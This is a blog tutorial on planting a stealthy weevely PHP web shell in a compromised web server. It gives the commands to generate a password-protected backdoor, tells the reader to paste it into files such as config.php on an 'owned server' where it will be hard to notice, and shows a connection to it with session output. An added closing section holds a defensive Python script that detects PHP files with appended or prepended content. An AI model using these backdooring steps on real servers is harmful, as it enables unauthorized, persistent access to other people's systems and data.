Monday, 2 September 2013

How To Backdoor A WebServer Using Weevely PHP Backdoor


In this tutorial, I will show you how to use the weevely PHP backdoor to backdoor an Apache webserver. You can use this method to backdoor any webserver that runs PHP.

Note:  
The weevely PHP backdoor is very stealthy. It resides in the page that we backdoor, but it is hard to detect. Moreover, its password protection feature makes it more secure from a backdooring perspective.

First you need to install weevely on your machine.

Download weevely

If you are on Windows, follow my tutorial "How to install weevely web-backdoor tool on Windows". For Linux users, it's simple: just download it and run it with Python.

Now let's start the backdooring procedure.

1- Open a terminal or cmd and run weevely to verify that it is working.

CMD: weevely.py
Terminal: ./weevely.py

Note: 
I will show this tutorial for a Linux environment. Windows users must replace ./weevely.py with weevely.py to make it work on Windows.

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Start ssh-like terminal session
    weevely <url> <password>

[+] Run command directly from command line
    weevely <url> <password> [ "<command> .." | :<module> .. ] 

[+] Restore a saved session file
    weevely session [ <file> ]

[+] Generate PHP backdoor
    weevely generate <password> [ <path> ] ..

[+] Show credits
    weevely credits
   
[+] Show available module and backdoor generators
    weevely help

2- Now run the weevely generate command to generate a PHP backdoor.

./weevely.py generate exploiter_zee ~/Desktop/backdoor.php

Output:

[generate.php] Backdoor file '/home/exploiter/Desktop/backdoor.php' created with password 'exploiter_zee'

3- The generated backdoor is now available at the path we provided. Open it with a text editor and copy all the code of this backdoor.php. Now go back to your owned server and open a file that you want to backdoor. For example, I want to backdoor config.php, config.inc.php, connection.php etc. Open each file and paste this code at the end or start of that PHP file. (I would recommend pasting at the end of the file, because it will make your injected backdoor a little bit anonymous.)

4- Now the server is backdoored. Let's test it with our weevely tool. Open a terminal or cmd and connect to those backdoored files using the following weevely command.

./weevely.py http://site.com/config.php exploiter_zee

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/telekomxchange.net/config.session'

[shell.php] [!] Error: No response
hostan@:/home1/hostan/public_html $

Brief Explanation:
In the above command we are connecting to the config.php file that we backdoored a moment ago, and exploiter_zee is the password of our backdoor.
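
Seen from the server owner's side, step 3 leaves a trace: a file such as config.php keeps its original content and gains extra bytes at the end or start. The script below is an added example, not part of the original tutorial or of weevely. It records a hash baseline of every .php file and later reports which files were appended to, prepended to, or otherwise changed. The file names, the sample web root and the placeholder comment are constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path


def sha(data):
    return hashlib.sha256(data).hexdigest()


def snapshot(root):
    """Record (sha256, size) for every .php file under root, keyed by relative path."""
    return {str(p.relative_to(root)): (sha(p.read_bytes()), p.stat().st_size)
            for p in Path(root).rglob("*.php")}


def classify(root, baseline):
    """Compare the tree with the baseline and report how each file changed."""
    current = snapshot(root)
    findings = {rel: "new" for rel in current if rel not in baseline}
    for rel, (old_hash, old_size) in baseline.items():
        if rel not in current:
            findings[rel] = "missing"
        elif current[rel][0] != old_hash:
            data = (Path(root) / rel).read_bytes()
            grew = len(data) > old_size
            if grew and sha(data[:old_size]) == old_hash:
                findings[rel] = "appended"    # original intact, extra bytes at the end
            elif grew and sha(data[len(data) - old_size:]) == old_hash:
                findings[rel] = "prepended"   # original intact, extra bytes at the start
            else:
                findings[rel] = "modified"
    return findings


def demo():
    """Constructed sample web root; the added bytes are a harmless placeholder."""
    original = b"<?php $db_host = 'localhost'; ?>\n"
    extra = b"<?php /* placeholder for pasted code */ ?>\n"
    with tempfile.TemporaryDirectory() as root:
        for name in ("config.php", "connection.php", "index.php"):
            (Path(root) / name).write_bytes(original)
        baseline = snapshot(root)  # taken while the files are known-good
        (Path(root) / "config.php").write_bytes(original + extra)
        (Path(root) / "connection.php").write_bytes(extra + original)
        return classify(root, baseline)


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{verdict:10} {path}")
```

The baseline only helps if it is taken from a known-good deployment and stored somewhere the web server account cannot write to.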